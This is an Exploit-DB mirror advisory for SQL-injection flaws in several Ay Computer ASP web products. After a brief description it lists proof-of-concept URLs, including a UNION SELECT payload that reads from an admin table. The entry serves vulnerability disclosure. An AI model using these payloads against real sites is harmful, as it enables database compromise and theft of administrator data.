exploit-db-mirror/platforms/asp/webapps/36139.txt
Offensive Security 62f8955407 Update: 2015-02-22
12 new exploits
2015-02-22 08:37:11 +00:00

19 lines
No EOL
835 B
Text
Executable file

source: http://www.securityfocus.com/bid/49668/info
Multiple Ay Computer products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/v1/urundetay.asp?id=21%28%29
http://www.example.com/v1/default.asp?getir=urunler&id=39%28%29
http://www.example.com/v1/linkler.asp?id=2%28%29
http://www.example.com/detay.asp?ilanid=8%28%29 [SQL]
http://www.example.com/kategoriler.asp?id=4%28%29 [SQL]
http://www.example.com/link.asp?page=referanslarimiz&id=2%28%29 [SQL]
http://www.example.com/?catid=23+union+select+0,1,2,3,4,5+from+admin